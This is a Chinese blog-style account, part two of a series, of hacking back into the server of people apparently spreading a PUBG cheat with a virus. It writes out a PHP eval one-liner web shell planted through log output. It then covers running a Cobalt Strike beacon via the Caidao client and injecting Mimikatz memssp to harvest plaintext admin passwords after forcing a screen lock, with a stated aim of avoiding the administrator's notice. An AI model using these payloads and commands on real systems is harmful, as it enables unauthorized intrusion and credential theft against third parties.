记一次对PUBG外挂病毒的反制过程(2)

3.设置日志文件输出的路径，结合PHPinfo文件得到网站的绝对路径，直接输出到web路径下。

4.写入一句话，输出到日志文件中。select ‘<?php eval($_POST['tools']);?>’

菜刀连接上刚刚导出的一句话。

到这里就已经拿到了webshell，但shell 的权限还太过于小我们的目标是拿下对方的系统权限，这里我用cs上线方便后续的操作，cs生成上线程序“splww64.exe”，利用菜刀的虚拟终端管理运行我们的程序。

过了几秒Cs这边也上线了。

权限到手后接下来就是激动人心的读取密码了，当然我们已经有了Administrator的权限可以自己添加个新用户，但这样会引起管理员的注意。

这里我们用cs自带的mimikatz来抓取用户的登陆密码，但很遗憾的是对方服务器是Windows Server 2012 R2版本的，Windows Server 2012 R2已经修复了以前从内存获取密码的漏洞，并且IPC$的远程认证方式也改变了，导致没办法进行hash注入，因为默认不存储LM hash ，也只能抓取NTLM hash ，基本上也是很难破解成功的。

难道就这样半途而废了么，不不不，敲黑板敲黑板了，Mimikatz –内存中的SSP，当用户再次通过系统进行身份验证时，将在System32中创建一个日志文件，其中将包含纯文本用户密码，此操作不需要重启目标机子，只需要锁屏对方再登陆时即可记录下明文密码，需另传mimikatz.exe程序到目标机子，然后在cs终端执行C:/mimikazt.exe privilege::debug misc::memssp exit当看到Injected =）的时候，表明已经注入成功。

接下来就是使对方的屏幕锁屏，终端键入rundll32.exe use***.dll,LockWorkStation命令。

过了许久…..许久….再次使用net user Administrator查看用户登陆情况。